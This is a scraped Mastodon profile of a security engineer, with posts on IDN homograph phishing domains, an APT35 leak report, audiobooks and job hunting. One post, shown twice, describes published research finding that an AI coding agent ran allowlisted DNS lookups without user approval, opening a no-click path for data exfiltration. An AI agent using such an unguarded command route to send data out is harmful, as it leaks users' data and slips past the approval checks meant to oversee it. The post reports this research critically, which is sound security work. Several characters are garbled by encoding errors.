Ian Campbell π΄
@neurovagrant@masto.deoan.org
"What radicalized you?"
When they DRM'd coffee.
Ian Campbell π΄@neurovagrant@masto.deoan.org
Security ops engineer for DomainTools, DT Investigations threat researcher, writer, voracious reader. he/him. Fan of good trouble. Opinions here mine only. No LLM content from me, all flaws detected are human-generated. Autistic/depressed/anxious/hungry.
#infosec #cybersecurity #privacy #actuallyautistic #neurodivergent
- Notes
- 1141
- Following
- 0
- Followers
- 0
- advice
- Be the computing problem you wish to see in the world.
- DomainTools Investigations
- https://dti.domaintools.com
- Latest work reading list:
- https://dti.domaintools.com/cybersecurity-reading-list-week-of-2025-10-27/
Ian Campbell π΄@neurovagrant@masto.deoan.org
Ian Campbell π΄@neurovagrant@masto.deoan.org
Hello friends, I've seen the below image come up a few times elsewhere and am going to expound a little!
While the hyperlinks in the image display correctly, those aren't actually the addresses of those sites! Instead, they're the Internationalized Domain Name replacements - examples of what are called IDN Homograph Attacks.
It's incredibly hard to include all characters from all active alphabets in the mechanisms that resolve domain names - so currently that letter set is restricted, and instead uses a translation system called Punycode to move between a visual URL with the correct characters and a domain name your computer can actually resolve to a website.
So while neurovagrant[.]com is fine either way, nΣΜurovagrant[.]com isn't! The actually domain would be xn--nurovagrant-rkg322d[.]com.
Notice that xn-- ! That's what tells browsers and other software that it's an IDN domain, and to try and translate it.
Attackers use this to their benefit. So:
xn--mcrosoft-security-teams-1ec[.]com can appear in your email, on your twitter feed, in other places visually as: mΓcrosoft-security-teams[.]com
You may think you're signing in to check your retirement at vanguarΙ[.]com but it's actually sent you to xn--vanguar-4cd[.]com
A link that appears as vαΈnmo[.]com actually sends you to the website xn--vnmo-q64a[.]com
They even target kids! Take a look at xn--rblox-jua[.]com - which looks like rΓΆblox[.]com in most settings. Note the diacritical mark above the first o.
If anything looks off, there's a reason. Always view links with skepticism, don't click on things unnecessarily, and always sign into the sites you use by going to the domain name you know.
Stay frosty out there, friends.
#cybersecurity #infosec #StayFrosty
Ian Campbell π΄@neurovagrant@masto.deoan.org
Some introductory information:
I'm a security operations engineer in the cybersecurity space, a lovingly hungry reader (nonfiction, speculative fiction, and horror especially), a sometimes-writer when I have the brainspace for it.
I love crows, spooky things, democracy, and coffee.
I'm at times depressed, or anxious, and diagnosed autistic so I talk about neurodivergence too.
Ian Campbell π΄@neurovagrant@masto.deoan.org
dying laughing here:
https://github.com/google-gemini/gemini-cli/issues/16750
Ian Campbell π΄@neurovagrant@masto.deoan.org
For my friends out there on the job hunt.
Ian Campbell π΄@neurovagrant@masto.deoan.org
New research out from @DomainTools@infosec.exchange Investigations today!
We took time to pull apart the "Charming Kitten" data dump and analyze it accordingly.
Always fascinating to me how different the threat actor groups can be both domestically and regionally. In APT35's case, much more militarily regimented, versus hybrid "state startup waterfall" or "criminal-state merge blend" setups.
#infosec #cybersecurity #threatintel
https://dti.domaintools.com/threat-intelligence-report-apt35-internal-leak-of-hacking-campaigns-against-lebanon-kuwait-turkey-saudi-arabia-korea-and-domestic-iranian-targets/
Ian Campbell π΄@neurovagrant@masto.deoan.org
Audiobooks are a 100% valid way of reading, and if it's your primary way, I hear & honor ya.
Your irregular reminder that if you enjoy audiobooks Libro.fm is an incredibly good replacement for Audible.
Libro.fm provides DRM-free downloadable MP3 versions of the book (in addition to having an app you can use). They've had at least 90% of the books I've looked for.
They're also an employee-owned social corporation that allows you to support local independent bookstores with your purchases.
Ian Campbell π΄@neurovagrant@masto.deoan.org
i mean who could've expected a yearslong, deeply researched, regularly used method of data exfiltration COULD BE ABUSED BY REMOVING NECESSARY USER INTERACTION
Ian Campbell π΄@neurovagrant@masto.deoan.org
me trying to be less adversarial towards AI and then they specifically enable noclick DNS exfil
Ian Campbell π΄@neurovagrant@masto.deoan.org
This is some really smart digging: realizing that Claude Code does not require user interaction for certain bash commands, they discovered that DNS lookups were specifically allowlisted, clearing a trivial path for well-known DNS exfiltration methods.
So when I say βall these implementations are ignoring years and decades of lessons learned the hard wayβ itβs not hyperbole. Anthropic 100% cleared the path for DNS exfil here.
h/t to @cR0w@infosec.exchange - thank you!
#infosec #genai
https://embracethered.com/blog/posts/2025/claude-code-exfiltration-via-dns-requests/
Ian Campbell π΄@neurovagrant@masto.deoan.org
i mean who could've expected a yearslong, deeply researched, regularly used method of data exfiltration COULD BE ABUSED BY REMOVING NECESSARY USER INTERACTION
Ian Campbell π΄@neurovagrant@masto.deoan.org
This is some really smart digging: realizing that Claude Code does not require user interaction for certain bash commands, they discovered that DNS lookups were specifically allowlisted, clearing a trivial path for well-known DNS exfiltration methods.
So when I say βall these implementations are ignoring years and decades of lessons learned the hard wayβ itβs not hyperbole. Anthropic 100% cleared the path for DNS exfil here.
h/t to @cR0w@infosec.exchange - thank you!
#infosec #genai
https://embracethered.com/blog/posts/2025/claude-code-exfiltration-via-dns-requests/
Ian Campbell π΄@neurovagrant@masto.deoan.org
Hey! I know those guys!! Great conversation between two of the best leaders I've ever worked under. When you hear @danonsecurity@infosec.exchange talk about his love of and approach to community, you'll see why I'm ride-or-die.
And having been on 12-24hr bridge calls with both he and @bapril@infosec.exchange when the crap hit the fan, as well as having come to them both to take responsibility for mistakes or errors in judgment, I can vouch that they both walk the walk covered here.
#infosec
https://youtu.be/yuryI513s2M
Ian Campbell π΄@neurovagrant@masto.deoan.org
Ian Campbell π΄@neurovagrant@masto.deoan.org
Ian Campbell π΄@neurovagrant@masto.deoan.org
Ian Campbell π΄@neurovagrant@masto.deoan.org